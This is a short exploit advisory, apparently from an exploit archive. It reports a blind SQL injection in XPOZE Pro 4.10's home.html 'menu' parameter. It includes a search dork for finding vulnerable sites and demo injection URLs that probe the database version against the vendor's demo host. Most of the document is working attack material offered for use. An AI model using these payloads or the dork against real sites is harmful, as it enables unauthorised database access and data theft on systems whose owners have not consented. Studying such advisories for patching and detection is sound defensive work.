XPOZE Pro version 4.10 suffers from a remote blind SQL injection vulnerability in home.html.
436d4ac79907b44b0dafe21a61ac7e32c13297f3dadc27319d9e176974a8718d
[■] Xpoze Pro (home menĂ¹) <= Blind $ql Injection
>---------------------------------------<
> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/
>---------------------------------------<
[■] ExPL0iT:
Dork: " Powered by Xpoze "
|: http://www.example.com/home.html?menu=[$qL]
[■] D£M0:
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5 [NO°°]
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)]
[■] Th4nKs::
\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )